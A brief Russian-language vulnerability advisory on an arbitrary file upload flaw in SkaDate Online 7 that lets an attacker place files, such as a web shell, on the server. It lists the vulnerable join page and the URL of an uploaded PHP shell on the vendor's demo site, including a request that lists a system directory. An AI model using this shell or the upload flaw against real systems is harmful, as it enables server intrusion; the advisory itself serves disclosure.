Программа: SkaDate Online 7

Найденная уязвимость позволяет перезаписать произвольные файлы на целевой
системе. Уязвимость существует из-за ошибки в проверке входных данных. Атакующий
может загрузить произвольные файлы на целевую систему (например, шелл).

Эксплоит:

http://www.skadate.com/demo/member/join.php

Шелл:

http://www.skadate.com/demo/$userfiles/tmp/0b3291151174726fefa04cfaf43fd2bc.php

http://www.skadate.com/demo/$userfiles/tmp/0b3291151174726fefa04cfaf43fd2bc.php?act=ls&d=%2Fetc%2Fvdomainaliases

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии